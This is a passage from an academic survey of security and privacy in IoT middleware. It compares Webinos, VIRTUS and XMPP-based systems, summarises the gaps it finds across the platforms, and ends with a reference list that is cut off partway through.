Zone Hub acts as a service to collect and offer access to data and capabilities of the user’s devices. The PZH acts as a certificate authority, issuing certificates to the devices that are used for mutual authentication using TLS. User’s authenticate to the PZH using the OpenID protocol. On the device, a communications module known as the Personal Zone Proxy (PZP) handles all communications with the PZH. The idea of the Personal Zone may have significant issues however, when a single device is used by many different people (for example, the in-car system in a taxi as opposed to a personal vehicle). These issues are not addressed in Webinos, though they are called out in the lessons learnt. Webinos utilizes policy-based access control modelled in the XACML [79] language. The system pushes XACML policies out to devices to limit the spread of personal and contextual data. Webinos addresses the issue of software modification using an attestation API, which can report whether the software running is the correct level. This requires the device to be utilising Trusted Platform Module (TPM) hardware that can return attestation data. Webinos also addresses the issue of using secure storage on devices where the device has such storage. While the Webinos project does address many of the privacy concerns of users through the use of the Personal Zone Hub, there is clearly further work that could be done. In particular the ability for users to define what data they share with other users or other systems using a protocol such as OAuth2 [84], and the ability to install filters or other anonymising or data reduction aggregators into the PZH are lacking. One other aspect of Webinos that is worth drawing attention to is the reliance on a certain size of device: the PZP that is needed on the device is based on the node.js framework and therefore the device needs to be of a certain size (e.g. a 32-bit processor running a Linux derivative or similar) to participate in Webinos. 6.19 VIRTUS The VIRTUS middleware [48] utilizes the core security features of the XMPP protocol to ensure security. This includes tunnelling communications over TLS, authentication via SASL, and access control via XMPP’s built-in mechanisms. SASL is a flexible mechanism for authentication which supports a number of different systems including token-based approaches such as OAuth2 or Kerberos, username/password, or X.509 certificates. For client-to-server based communications, it is not clear from the description which of these methods is actually implemented within VIRTUS. For server-to-server communications there is specified the use of SASL to ensure full server federation. While the VIRTUS model does not describe the challenges of implementing a personal instance of middleware for single users or devices, there is a concept of edge computing described, where some interactions may happen within an edge domain (e.g. within a house) and lower security is required within that domain while higher security is expected when sharing that data outside. This model is fairly briefly described but provides an interesting approach. One challenge is that there are multiple assumptions to this: firstly, that security within the limited domain needs less security, when there may be attackers within that perimeter. Secondly, that the open channel to the wider Internet cannot be misused to attack the edge network. The ability to calculate, summarise and/or filter data from the edge network before sharing it is also not discussed except in very granular terms (e.g. some data are available, other data are not). 6.20 XMPP The paper [91] describes how the XMPP architecture can be applied to the challenges of M2M and hence the IoT, together with a proof-of-concept approach. The system relies on the set of XMPP extensions 21/34 around publish/subscribe and the related XMPP security models to implement security. This includes TLS for encryption, and access control models around publish-subscribe. There is also a discussion about leakage of information such as presence from devices. The proof-of-concept model did not include any federated identity models, but did utilize a One-Time Password (OTP) model on top of XMPP to address the concepts such as temporary loans of devices. 7 SUMMARY OF IOT MIDDLEWARE SECURITY In reviewing both the security and privacy challenges of the wider IoT and a structured review of more than fifty middleware platforms, we have identified some key categories that can be applied across these areas. Firstly, we identified the significant proportion of the systems that did not address security, left it for further work, or did not describe the security approach in any meaningful detail. There were other systems (such as UBIWARE and NAPS) that offer theoretical models but did not demonstrate any real-world implementation or concrete approach. The next clear category are those middlewares that apply the SOAP/Web Services model of security. This includes SOCRADES, SIRENA, and Hydra/Linksmart. As we have discussed in the previous sections there are significant challenges in performance, memory footprint, processor power and usability of these approaches when used with the IoT. Two of the approaches delegate the model to the XMPP standards: VIRTUS and XMPP [49, 91]. XMPP also has the complexity of XML, but avoids the major performance overheads by using TLS instead of XML Encryption and XML Security. In addition, recent work on XMPP using EXI makes this approach more effective for IoT. This finally leaves a few unique approaches, each of which brings their own unique benefits. DREMS is the only system to provide Multi-level security based on the concept of security clearances. While this model is attractive to government and military circles (because of the classification systems used in those circles), we would argue that it fails in many regards for IoT. In particular there are no personal controls, no concept of federated identity and no policy based access controls in this model. SMEPP offers a model based on public key infrastructures and shared session keys. We would argue this approach has a number of challenges scaling to the requirements of the IoT. Firstly, there are significant issues in key distribution and key revocation. Secondly, this model creates a new form of perimeter - based on the concept of a shared session key. That means that if one device is compromised then the data and control of all the devices in that group are also compromised. Only Dioptase supports the concept of stream processing in the cloud, which we argue is a serious requirement for the IoT. The requirement is to be able to filter, summarise and process streams of data from devices to support anonymisation and reduction of data leakage. FIWARE has a powerful and extensible model for authentication and access control, including support for federated identity and policy-based access control. Finally, the we identified that the most advanced approach is that proposed by Webinos. Webinos utilizes some key technologies to provide a security and privacy model. Firstly, this uses policy-based access control (XACML). The model does not however support user-guided access control mechanisms such as OAuth2 or UMA. Webinos does support the use of Federated Identity tokens (OpenID), but only from users to the cloud, as opposed to devices to the cloud. We and others have proposed the model of using federated identity tokens from the device to the cloud in [70, 71, 47]. The contribution of the Webinos work with the largest potential impact is the concept of Personal Zone Hub, which is a cloud service dedicated to a single user to handle the security and privacy requirements of that user. There is, however, further research around this area: the PZH model from Webinos does not examine many of the challenges of how to implement the PZH in real life. For example, user registration, cloud hosting, and many other aspects need to be defined in more detail before the Webinos PZH model is practicable for real world projects. In addition there are challenges using the PZH model with smaller devices, because of the requirement to use the PZP. 7.1 Overall gaps in the middleware When we look at the requirements for security and privacy of the Internet of Things we can see there are some gaps that are not provided by any of the reviewed middleware systems. 22/34 • Only two of the middleware systems explicitly applied the concept of PBD in designing a mid- dleware directly to support privacy, although Webinos did exhibit many of the characteristics of a system that used this approach. • Only two of the systems applied any concepts of context-based security or reputation to IoT devices. • User consent was only supported in three of the systems. • None of the systems supported anonymous identities or attestation. • None of the systems satisfied all the requirements identified. 8 DISCUSSION 8.1 Contributions In this paper we have taken a two-phase approach to reviewing the available literature around the security and privacy of IoT devices. In the first part we created a matrix of security challenges that applied the existing CIA+ model to three distinct areas: device, network and cloud. This new model forms a clear contribution to the literature. In each of the cells of the matrix we identified threats, challenges and/or approaches, or in a few cells we identified that the challenges are not exacerbated by IoT concerns. We further used Spiekerman and Cranor’s three layer privacy model to analyse the privacy requirements of IoT. We used this analysis to identify seven major requirements and five subsidiary requirements. In the second part, we used a structured search approach to identity 54 specific IoT middleware frameworks and we analysed the security models of each of those. We utilised the twelve requirements from the first phase to validate the capabilities of each system. While there are existing surveys of IoT middleware, none of them focussed on a detailed analysis of the security of the surveyed systems and therefore this has a clear contribution to the literature. 8.2 Further Work In our survey, we have identified some clear gaps. Over half the surveyed systems had either no security or no substantive discussion of security. Out of the surveyed systems we found very few that addressed a significant proportion of the major challenges that we identified in the first section. We found certain aspects that were identified in the first section that were not addressed by any of the surveyed systems. Based on this we believe there is a significant opportunity to contribute to the research by creating a middleware for IoT that addresses these gaps. • To define a model and architecture for IoT middleware that is designed from the start to enable privacy and security (Privacy by Design). • Secondly, to bring together the best practice into a single middleware that includes: federated identity (for users and devices), policy-based access control, user managed access to data, stream processing in the cloud. • Thirdly, there is considerable work to be done to define a better model around the implementation challenges for the concept of a personal cloud service (e.g the Webinos PZH). This includes the hosting model, bootstrapping, discovery and usage for smaller devices. • Finally, creating a middleware system that applies context-based security and reputation to IoT middleware. REFERENCES [1] ABDUL-RAHMAN, A., AND HAILES, S. Supporting trust in virtual communities. In HICSS ’00: Proceedings of the 33rd Hawaii International Conference on System Sciences-Volume 6 (Washington, DC, USA, 2000), IEEE Computer Society. [2] ABERER, K., AND HAUSWIRTH, M. Middleware support for the” internet of things”. 23/34 [3] ABERER, K., AND HAUSWIRTH, M. Middleware support for the” internet of things”. [4] ADETOYE, A. O., AND BADII, A. Foundations and applications of security analysis. Springer- Verlag, Berlin, Heidelberg, 2009, ch. A Policy Model for Secure Information Flow, pp. 1–17. [5] AGHA, G. A. Actors: A model of concurrent computation in distributed systems. Tech. rep., DTIC Document, 1985. [6] AGIRRE, A., PARRA, J., ARMENTIA, A., ESTÉVEZ, E., AND MARCOS, M. Qos aware middleware support for dynamically reconfigurable component based iot applications. International Journal of Distributed Sensor Networks (2016). [7] ALESSI, M., GIANGRECO, E., PINNELLA, M., PINO, S., STORELLI, D., MAINETTI, L., MIGHALI, V., AND PATRONO, L. A web based virtual environment as a connection platform between people and iot. In Computer and Energy Science (SpliTech), International Multidisciplinary Conference on (2016), IEEE, pp. 1–6. [8] ALI, M., NELSON, J., SHEA, R., AND FREEDMAN, M. J. Blockstack: Design and implementation of a global naming system with blockchains. Last visited on 25, 2 (2016). [9] ANAND, P. Enabling context-aware computing in internet of things using m2m. In Nanoelectronic and Information Systems (iNIS), 2015 IEEE International Symposium on (2015), IEEE, pp. 219–224. [10] ANDERSSON, K., AND SZEWCZYK, P. Insecurity by obscurity continues: are adsl router manuals putting end-users at risk. [11] ARCANGELI, J.-P., BOUZEGHOUB, A., CAMPS, V., CANUT, M.-F., CHABRIDON, S., CONAN, D., DESPRATS, T., LABORDE, R., LAVINAL, E., LERICHE, S., ET AL. Income–multi-scale context management for the internet of things. In International Joint Conference on Ambient Intelligence (2012), Springer, pp. 338–347. [12] ARDUINO. Arduino. http://arduino.cc/, 2015. [13] ARJUNAN, P., SAHA, M., CHOI, H., GULATI, M., SINGH, A., SINGH, P., AND SRIVASTAVA, M. B. Sensoract: A decentralized and scriptable middleware for smart energy buildings. In Ubiquitous Intelligence and Computing and 2015 IEEE 12th Intl Conf on Autonomic and Trusted Computing and 2015 IEEE 15th Intl Conf on Scalable Computing and Communications and Its Associated Workshops (UIC-ATC-ScalCom), 2015 IEEE 12th Intl Conf on (2015), IEEE, pp. 11–19. [14] ASHTON, K. That ‘internet of things’ thing. RFiD Journal 22 (2009), 97–114. [15] ASPIRE, F. Fp7 ict ip project advanced sensors and lightweight programmable middleware for innovative rfid enterprise applications (aspire), 2008. [16] ATMEL. Master’s thesis, 2015. [17] ATZORI, L., IERA, A., AND MORABITO, G. The internet of things: A survey. Computer networks 54, 15 (2010), 2787–2805. [18] AUDET, F., AND JENNINGS, C. Network address translation (nat) behavioral requirements for unicast udp. Tech. rep., 2007. [19] AUGUSTO, A. B., AND CORREIA, M. E. An xmpp messaging infrastructure for a mobile held security identity wallet of personal and private dynamic identity attributes. Proceedings of the XATA (2011). [20] AUGUSTYN, J., MAŚLANKA, P., AND HAMUDA, G. Hi-speed usb based middleware for integration of real-time systems with the cloud. International Journal of Distributed Sensor Networks (2016). [21] AZIZ, B., FREMANTLE, P., WEI, R., AND ARENAS, A. A utility-based reputation model for the internet of things. In IFIP International Information Security and Privacy Conference (2016), Springer, pp. 261–275. [22] BALAKRISHNAN, S. M., AND SANGAIAH, A. K. Mifim – middleware solution for service centric anomaly in future internet models. Future Generation Computer Systems (2016). [23] BALL, J. Nsa stores metadata of millions of web users for up to a year, se- cret files show. http://www.theguardian.com/world/2013/sep/30/ nsa-americans-metadata-year-documents, 2013. (Visited on 06/08/2015). 24/34 [24] BANDYOPADHYAY, S., SENGUPTA, M., MAITI, S., AND DUTTA, S. Role of middleware for internet of things: A study. International Journal of Computer Science & Engineering Survey (IJCSES) 2, 3 (2011), 94–105. [25] BANDYOPADHYAY, S., SENGUPTA, M., MAITI, S., AND DUTTA, S. A survey of middleware for internet of things. In Recent Trends in Wireless and Mobile Networks. Springer, 2011, pp. 288–296. [26] BANOUAR, Y., REDDAD, S., DIOP, C., CHASSOT, C., AND ZYANE, A. Monitoring solution for autonomic middleware-level qos management within iot systems. In Computer Systems and Applications (AICCSA), 2015 IEEE/ACS 12th International Conference of (2015), IEEE, pp. 1–8. [27] BARANIUK, C. Ashley madison:‘suicides’ over website hack. BBC News 24 (2015). [28] BARBON, G., MARGOLIS, M., PALUMBO, F., RAIMONDI, F., AND WELDIN, N. Taking arduino to the internet of things: the asip programming model. Computer Communications 89 (2016), 128–140. [29] BENITO, R. J. C., MÁRQUEZ, D. G., TRON, P. P., CASTRO, R. R., MARTÍN, N. S., AND MARTÍN, J. L. S. Smepp: A secure middleware for embedded p2p. Proceedings of ICT-MobileSummit 9 (2009). [30] BERNABE, J. B., HERNÁNDEZ, J. L., MORENO, M. V., AND GOMEZ, A. F. S. Privacy-preserving security framework for a social-aware internet of things. In International Conference on Ubiquitous Computing and Ambient Intelligence (2014), Springer, pp. 408–415. [31] BILLET, B., AND ISSARNY, V. Dioptase: a distributed data streaming middleware for the future web of things. Journal of Internet Services and Applications 5, 1 (2014), 1–19. [32] BINNA, M. www.w3.org/2008/xmlsec/papers/c14n2 performance evaluation thesis.pdf. http: //www.w3.org/2008/xmlsec/papers/C14N2\_Performance\_Evaluation\ _Thesis.pdf, 2008. (Visited on 06/09/2015). [33] BITCOIN. System requirements. https://bitcoin.org/en/bitcoin-core/ features/requirements#system-requirements, 1 2017. (Accessed on 02/26/2017). [34] BOHN, H., BOBEK, A., AND GOLATOWSKI, F. Sirena-service infrastructure for real-time embedded networked devices: A service oriented framework for different domains. In Networking, International Conference on Systems and International Conference on Mobile Communications and Learning Technologies, 2006. ICN/ICONS/MCL 2006. International Conference on (2006), IEEE, pp. 43–43. [35] BOJINOV, H., MICHALEVSKY, Y., NAKIBLY, G., AND BONEH, D. Mobile device identification via sensor fingerprinting. arXiv preprint arXiv:1408.1416 (2014). [36] BOTEZATU, B. 25 percent of wireless networks are highly vulnerable to hacking attacks, wi-fi security survey reveals — hotforsecurity. http://www.hotforsecurity.com/blog/ 25-percent-of-wireless-networks-are-highly-vulnerable-to-hacking-attacks-wi- html, 2011. (Visited on 07/14/2015). [37] BRAY, T. E. A. Extensible Markup Language (XML) 1.0. Recommendation, W3C, February 2004. Available at http://www.w3.org/TR/REC-xml. [38] BRICKELL, E., CAMENISCH, J., AND CHEN, L. Direct anonymous attestation. In Proceedings of the 11th ACM conference on Computer and communications security (2004), ACM, pp. 132–145. [39] CAM-WINGET, N., HOUSLEY, R., WAGNER, D., AND WALKER, J. Security flaws in 802.11 data link protocols. Communications of the ACM 46, 5 (2003), 35–39. [40] CAPORUSCIO, M., RAVERDY, P.-G., AND ISSARNY, V. ubisoap: A service-oriented middleware for ubiquitous networking. Services Computing, IEEE Transactions on 5, 1 (2012), 86–98. [41] CARD, J. Anonymity is the internet’s next big battleground. http://www.theguardian.com/media-network/2015/jun/22/ anonymity-internet-battleground-data-advertisers-marketers, 2015. (Visited on 07/13/2015). [42] CARVALHO, M. A., AND SILVA, J. N. Poster: Unified remoteu¡ for mobile environments. In Proceedings of the 21st Annual International Conference on Mobile Computing and Networking (2015), ACM, pp. 245–247. 25/34 [43] CAVOUKIAN, A. Privacy in the clouds. Identity in the Information Society 1, 1 (2008), 89–108. [44] CHAKRAVORTY, R., CARTWRIGHT, J., AND PRATT, I. Practical experience with tcp over gprs. In Global Telecommunications Conference, 2002. GLOBECOM’02. IEEE (2002), vol. 2, IEEE, pp. 1678–1682. [45] CHAQFEH, M., MOHAMED, N., ET AL. Challenges in middleware solutions for the internet of things. In Collaboration Technologies and Systems (CTS), 2012 International Conference on (2012), IEEE, pp. 21–26. [46] CHEN, D., CHANG, G., SUN, D., LI, J., JIA, J., AND WANG, X. Trm-iot: A trust management model based on fuzzy reputation for internet of things. Computer Science and Information Systems 8, 4 (2011), 1207–1228. [47] CIRANI, S., PICONE, M., GONIZZI, P., VELTRI, L., AND FERRARI, G. IoT-OAS: An OAuth-based Authorization Service Architecture for Secure Services in IoT Scenarios. [48] CONZON, D., BOLOGNESI, T., BRIZZI, P., LOTITO, A., TOMASI, R., SPIRITO, M., ET AL. The virtus middleware: An xmpp based architecture for secure iot communications. In Computer Communications and Networks (ICCCN), 2012 21st International Conference on (2012), IEEE, pp. 1–6. [49] CONZON, D., BOLOGNESI, T., BRIZZI, P., LOTITO, A., TOMASI, R., SPIRITO, M., ET AL. The virtus middleware: An xmpp based architecture for secure iot communications. In Computer Communications and Networks (ICCCN), 2012 21st International Conference on (2012), IEEE, pp. 1–6. [50] CZAUSKI, T., WHITE, J., SUN, Y., TURNER, H., AND EADE, S. Nerd – middleware for iot human machine interfaces. Annals of Telecommunications 71, 3-4 (2016), 109–119. [51] DATABASE, N. V. Cve-2014-9222. https://web.nvd.nist.gov/view/vuln/detail? vulnId=CVE-2014-9222, 12 2014. (Accessed on 02/02/2017). [52] DE SOUZA, L. M. S., SPIESS, P., GUINARD, D., KÖHLER, M., KARNOUSKOS, S., AND SAVIO, D. Socrades: A web service based shop floor integration infrastructure. In The internet of things. Springer, 2008, pp. 50–67. [53] DEITEL, H. M. An introduction to operating systems, vol. 3. Addison-Wesley Reading, Mas- sachusetts, 1984. [54] DESRUELLE, H., LYLE, J., ISENBERG, S., AND GIELEN, F. On the challenges of building a web- based ubiquitous application platform. In Proceedings of the 2012 ACM Conference on Ubiquitous Computing (2012), ACM, pp. 733–736. [55] DICTIONARY, O. E. Oxford english dictionary online. (Accessed on 06/02/2017). [56] DIERKS, T. The transport layer security (tls) protocol version 1.2. [57] DOUCEUR, J. R. The sybil attack. In International Workshop on Peer-to-Peer Systems (2002), Springer, pp. 251–260. [58] DOURNAEE, B., AND DOURNEE, B. XML security. Mcgraw-hill, 2002. [59] DUHART, C., SAUVAGE, P., AND BERTELLE, C. Emma: A resource oriented framework for service choreography over wireless sensor and actor networks. arXiv preprint arXiv:1506.02531 (2015). [60] DUNKELS, A., ET AL. Efficient application integration in ip-based sensor networks. In Proceedings of the First ACM Workshop on Embedded Sensing Systems for Energy-Efficiency in Buildings (2009), ACM, pp. 43–48. [61] EISENHAUER, M., ROSENGREN, P., AND ANTOLIN, P. A development platform for integrat- ing wireless devices and sensors into ambient intelligence systems. In Sensor, Mesh and Ad Hoc Communications and Networks Workshops, 2009. SECON Workshops’ 09. 6th Annual IEEE Communications Society Conference on (2009), IEEE, pp. 1–3. [62] ELEFTHERAKIS, G., PAPPAS, D., LAGKAS, T., ROUSIS, K., AND PAUNOVSKI, O. Architecting the iot paradigm: a middleware for autonomous distributed sensor networks. International Journal of Distributed Sensor Networks 11, 12 (2015), 139735. 26/34 [63] ELKHODR, M., SHAHRESTANI, S., AND CHEUNG, H. A middleware for the internet of things. arXiv preprint arXiv:1604.04823 (2016). [64] ET AL, T. Authentication and authorization for constrained environments using oauth and uma. [65] ETSI. Etsi - m2m. http://www.etsi.org/technologies-clusters/ technologies/m2m, 2015. (Visited on 07/08/2015). [66] EVANS, D. The internet of things. How the Next Evolution of the Internet is Changing Everything, Whitepaper, Cisco Internet Business Solutions Group (IBSG) (2011). [67] FITBIT. Fitbit official site for activity trackers & more. http://www.fitbit.com/, 2015. (Visited on 07/09/2015). [68] FREMANTLE, P. Using oauth 2.0 with mqtt. http://pzf.fremantle.org/2013/11/ using-oauth-20-with-mqtt.html, 11 2013. (Accessed on 02/13/2017). [69] FREMANTLE, P., AND AZIZ, B. Oauthing: privacy-enhancing federation for the internet of things. In Proceedings of the 2nd International Conference on the Cloudification of the Internet of Things (2016), IEEE. [70] FREMANTLE, P., AZIZ, B., SCOTT, P., AND KOPECKÝ, J. Federated Identity and Access Management for the Internet of Things. In 3rd International Workshop on the Secure IoT (2014). [71] FREMANTLE, P., KOPECKÝ, J., AND AZIZ, B. Web API Management Meets the Internet of Things. Springer International Publishing, Cham, 2015, pp. 367–375. [72] FRONIMOS, T., LALIS, S., KOUTSOUBELIAS, M., AND BARTZANAS, T. Unified service-oriented access for wsns and dynamically deployed application tasks. In Internet-of-Things Design and Implementation (IoTDI), 2016 IEEE First International Conference on (2016), IEEE, pp. 247–252. [73] FULLAM, K., AND BARBER, K. Learning trust strategies in reputation exchange networks. In AAMAS ’06: Proceedings of the fifth international joint conference on Autonomous agents and multiagent systems (2006), ACM Press, pp. 1241–1248. [74] FURBER, S. B. ARM system Architecture. Addison-Wesley Longman Publishing Co., Inc., 1996. [75] GARCIA, F. D., DE KONING GANS, G., MUIJRERS, R., VAN ROSSUM, P., VERDULT, R., SCHREUR, R. W., AND JACOBS, B. Dismantling mifare classic. In European Symposium on Research in Computer Security (2008), Springer, pp. 97–114. [76] GIUSTO, D., IERA, A., MORABITO, G., AND ATZORI, L. The internet of things: 20th Tyrrhenian workshop on digital communications. Springer Science & Business Media, 2010. [77] GLIGORIĆ, N., DEJANOVIĆ, I., AND KRČO, S. Performance evaluation of compact binary xml representation for constrained devices. In Distributed Computing in Sensor Systems and Workshops (DCOSS), 2011 International Conference on (2011), IEEE, pp. 1–5. [78] GLIKSON, A. Fi-ware: Core platform for future internet applications. In Proceedings of the 4th Annual International Conference on Systems and Storage (2011). [79] GODIK, S., ANDERSON, A., PARDUCCI, B., HUMENN, P., AND VAJJHALA, S. Oasis extensible access control 2 markup language (xacml) 3. Tech. rep., Tech. rep., OASIS, 2002. [80] GOMES, B., MUNIZ, L., E SILVA, F. J. D. S., RÍOS, L. E. T., AND ENDLER, M. A comprehensive cloud-based iot software infrastructure for ambient assisted living. In Cloud Technologies and Applications (CloudTech), 2015 International Conference on (2015), IEEE, pp. 1–8. [81] GOODIN, D. New linux worm targets routers, cameras, internet of things devices, 2013. [82] GUDGIN, M. E. A. SOAP Version 1.2 Part 1: Messaging Framework. Recommendation, W3C, June 2003. Available at http://www.w3.org/TR/2003/REC-soap12-part1-20030624/. [83] GURA, N., PATEL, A., WANDER, A., EBERLE, H., AND SHANTZ, S. Comparing elliptic curve cryptography and rsa on 8-bit cpus. In Cryptographic Hardware and Embedded Systems - CHES 2004, M. Joye and J.-J. Quisquater, Eds., vol. 3156 of Lecture Notes in Computer Science. Springer Berlin Heidelberg, 2004, pp. 119–132. [84] HAMMER-LAHAV, D., AND HARDT, D. The oauth2.0 authorization protocol. 2011. Tech. rep., IETF Internet Draft, 2011. 27/34 [85] HANKS, P. Collins dictionary of the english language. London: Collins,— c1986, 2nd ed., edited by Hanks, Patrick 1 (1986). [86] HARDJONO, T., SMITH, N., AND PENTLAND, A. S. Anonymous identities for permissioned blockchains. [87] HASAN, S., AND CURRY, E. Thingsonomy: Tackling variety in internet of things events. Internet Computing, IEEE 19, 2 (2015), 10–18. [88] HERNÁNDEZ, M. E. P., AND REIFF-MARGANIEC, S. Autonomous and self controlling smart ob- jects for the future internet. In Future Internet of Things and Cloud (FiCloud), 2015 3rd International Conference on (2015), IEEE, pp. 301–308. [89] HERNÁNDEZ-RAMOS, J. L., JARA, A. J., MARIN, L., AND SKARMETA, A. F. Distributed capability-based access control for the internet of things. Journal of Internet Services and Information Security (JISIS) 3, 3/4 (2013), 1–16. [90] HILL, K. When ’smart homes’ get hacked: I haunted a complete stranger’s house via the internet - forbes. http://www.forbes.com/sites/kashmirhill/2013/07/26/ smart-homes-hack/, 2013. (Visited on 07/09/2015). [91] IIVARI, A., VÄISÄNEN, T., BEN ALAYA, M., RIIPINEN, T., AND MONTEIL, T. Harnessing xmpp for machine-to-machine communications & pervasive applications. Journal of Communications Software & Systems 10, 3 (2014). [92] INITIATIVE, K., ET AL. User managed access (uma), 2013. [93] JI, Z., GANCHEV, I., O’DROMA, M., ZHAO, L., AND ZHANG, X. A cloud-based car parking middleware for iot-based smart cities: design and implementation. Sensors 14, 12 (2014), 22372– 22393. [94] JØSANG, A., ISMAIL, R., AND BOYD, C. A Survey of Trust and Reputation Systems for Online Service Provision. Decision Support Systems 43, 2 (March 2007), 618–644. [95] KEOH, S., KUMAR, S., AND GARCIA-MORCHON, O. Securing the ip-based internet of things with dtls. Working Draft, February (2013). [96] KHURANA, H., HADLEY, M., LU, N., AND FRINCKE, D. A. Smart-grid security issues. Security & Privacy, IEEE 8, 1 (2010), 81–85. [97] KLIEM, A. Cooperative device cloud. [98] KOBLITZ, N. Elliptic curve cryptosystems. Mathematics of computation 48, 177 (1987), 203–209. [99] KOSCHUCH, M., HUDLER, M., AND KRÜGER, M. Performance evaluation of the tls handshake in the context of embedded devices. In Data Communication Networking (DCNET), Proceedings of the 2010 International Conference on (2010), IEEE, pp. 1–10. [100] LAN, L., WANG, B., ZHANG, L., SHI, R., AND LI, F. An event-driven service-oriented architecture for internet of things service execution. International Journal of Online Engineering (iJOE) 11, 2 (2015), pp–4. [101] LANDMAN, D. Davylandman/aeslib. https://github.com/DavyLandman/AESLib, 2015. (Visited on 07/09/2015). [102] LARSON, J., PERLROTH, N., AND SHANE, S. The nsa’s secret campaign to crack, un- dermine internet encryption - propublica. http://www.propublica.org/article/ the-nsas-secret-campaign-to-crack-undermine-internet-encryption, 2013. (Visited on 06/08/2015). [103] LE VINH, T., BOUZEFRANE, S., FARINONE, J.-M., ATTAR, A., AND KENNEDY, B. P. Middleware to integrate mobile devices, sensors and cloud computing. Procedia Computer Science 52 (2015), 234–243. [104] LEVÄ, T., MAZHELIS, O., AND SUOMI, H. Comparing the cost-efficiency of coap and http in web of things applications. Decision Support Systems 63 (2014), 23–38. 28/34 [105] LEVENDOVSZKY, T., DUBEY, A., OTTE, W. R., BALASUBRAMANIAN, D., COGLIO, A., NYAKO, S., EMFINGER, W., KUMAR, P., GOKHALE, A., AND KARSAI, G. Distributed real-time managed systems: A model-driven distributed secure information architecture platform for managed embedded systems. Software, IEEE 31, 2 (2014), 62–69. [106] LEVINSON, L. Secrets, lies and snowden’s email: why i was forced to shut down lavabit. http://www.theguardian.com/commentisfree/2014/may/20/ why-did-lavabit-shut-down-snowden-email, 2014. (Visited on 06/08/2015). [107] LIM, L., MARIE, P., CONAN, D., CHABRIDON, S., DESPRATS, T., AND MANZOOR, A. Enhancing context data distribution for the internet of things using qoc-awareness and attribute-based access control. Annals of Telecommunications 71, 3-4 (2016), 121–132. [108] LINKSMART. Eulinksmartsecuritycommunicationsecuritymanagersym - links- mart open source middleware - linksmart middleware portal. https:// linksmart.eu/redmine/projects/linksmart-opensource/wiki/ Eulinksmartsecuritycommunicationsecuritymanagersym, 2015. (Visited on 06/09/2015). [109] LINKSMART.EU. Linksmart middleware portal. https://linksmart.eu/redmine, 2015. (Visited on 07/09/2015). [110] LIU, C. H., YANG, B., AND LIU, T. Efficient naming, addressing and profile services in internet- of-things sensory environments. Ad Hoc Networks 18 (2014), 85–101. [111] LOCKE, D. Mq telemetry transport (mqtt) v3. 1 protocol specification. IBM developerWorks Technical Library], available at http://www. ibm. com/developerworks/webservices/library/ws- mqtt/index. html (2010). [112] LOMNE, V., DEHABOUI, A., MAURINE, P., TORRES, L., AND ROBERT, M. Side channel attacks. In Security Trends for FPGAS. Springer, 2011, pp. 47–72. [113] LUCKENBACH, T., GOBER, P., ARBANOWSKI, S., KOTSOPOULOS, A., AND KIM, K. Tinyrest-a protocol for integrating sensor networks into the internet. In Proc. of REALWSN (2005), pp. 101–105. [114] MAHALLE, P. N., ANGGOROJATI, B., PRASAD, N. R., AND PRASAD, R. Identity establishment and capability based access control (iecac) scheme for internet of things. In Wireless Personal Multimedia Communications (WPMC), 2012 15th International Symposium on (2012), IEEE, pp. 187–191. [115] MCDANIEL, P., AND MCLAUGHLIN, S. Security and privacy challenges in the smart grid. Security & Privacy, IEEE 7, 3 (2009), 75–77. [116] MHLABA, A., AND MASINDE, M. Implementation of middleware for internet of things in asset tracking applications: In-lining approach. In Industrial Informatics (INDIN), 2015 IEEE 13th International Conference on (2015), IEEE, pp. 460–469. [117] MICHIARDI, P., AND MOLVA, R. Core: a collaborative reputation mechanism to enforce node cooperation in mobile ad hoc networks. In Advanced Communications and Multimedia Security. Springer, 2002, pp. 107–121. [118] MILLER, V. S. Use of elliptic curves in cryptography. In Advances in Cryptology—CRYPTO’85 Proceedings (1986), Springer, pp. 417–426. [119] MONTANARI, R., TONINELLI, A., AND BRADSHAW, J. M. Context-based security management for multi-agent systems. In Multi-Agent Security and Survivability, 2005 IEEE 2nd Symposium on (2005), IEEE, pp. 75–84. [120] MORRIS, T. Trusted platform module., 2011. [121] MOSKOWITZ, R. Hip diet exchange (dex). [122] MOSKOWITZ, R. Host identity protocol architecture. [123] MPITZIOPOULOS, A., GAVALAS, D., KONSTANTOPOULOS, C., AND PANTZIOU, G. A survey on jamming attacks and countermeasures in wsns. IEEE Communications Surveys & Tutorials 11, 4 (2009). 29/34 [124] MURPHY, C. Internet of things: Who gets the data? - informationweek. http://www.informationweek.com/ strategic-cio/executive-insights-and-innovation/ internet-of-things-who-gets-the-data/a/d-id/1252701, 2014. (Visited on 06/08/2015). [125] NAKAMOTO, S. Bitcoin: A peer-to-peer electronic cash system. [126] NARAYANAN, A., AND SHMATIKOV, V. Robust de-anonymization of large sparse datasets. In Security and Privacy, 2008. SP 2008. IEEE Symposium on (2008), IEEE, pp. 111–125. [127] NAUMENKO, A., KATASONOV, A., AND TERZIYAN, V. A security framework for smart ubiquitous industrial resources. In Enterprise Interoperability II. Springer, 2007, pp. 183–194. [128] NEST, G. How to keep your nest products and the nest app up to date. https://nest.com/support/article/ How-to-keep-your-Nest-products-and-the-Nest-app-up-to-date, 2 2017. (Accessed on 02/13/2017). [129] NEWSOME, J., SHI, E., SONG, D., AND PERRIG, A. The sybil attack in sensor networks: analysis & defenses. In Proceedings of the 3rd international symposium on Information processing in sensor networks (2004), ACM, pp. 259–268. [130] NICHOLAS, S. Power profiling: Https long polling vs. mqtt with ssl on android (2012), 2012. [131] O. GARCIA-MORCHON, E. A. Security Considerations in the IP-based Internet of Things. Internet Draft, IETF, September 2013. Available at http://tools.ietf.org/html/ draft-garcia-core-security-06. [132] O’HEARN, Z. W. Names: Distributed, secure, human-readable: Choose two. https://web. archive.org/web/20011020191610/http://zooko.com/distnames.html, 10 2001. (Accessed on 02/13/2017). [133] PARK, K.-W., SEOK, H., AND PARK, K.-H. pkasso: towards seamless authentication providing non-repudiation on resource-constrained devices. In Advanced Information Networking and Ap- plications Workshops, 2007, AINAW’07. 21st International Conference on (2007), vol. 2, IEEE, pp. 105–112. [134] PARK, N., AND KANG, N. Mutual authentication scheme in secure internet of things technology for comfortable lifestyle. Sensors 16, 1 (2015), 20. [135] PATTI, E., ACQUAVIVA, A., JAHN, M., PRAMUDIANTO, F., TOMASI, R., RABOURDIN, D., VIRGONE, J., AND MACII, E. Event-driven user-centric middleware for energy-efficient buildings and public spaces. IEEE Systems Journal 10, 3 (2016), 1137–1146. [136] PAVERD, A., AND MARTIN, A. Hardware security for device authentication in the smart grid. In First Open EIT ICT Labs Workshop on Smart Grid Security - SmartGridSec12 (Berlin, Germany, 2012). [137] PERELMAN, V., AND ERSUE, M. Tls with psk for constrained 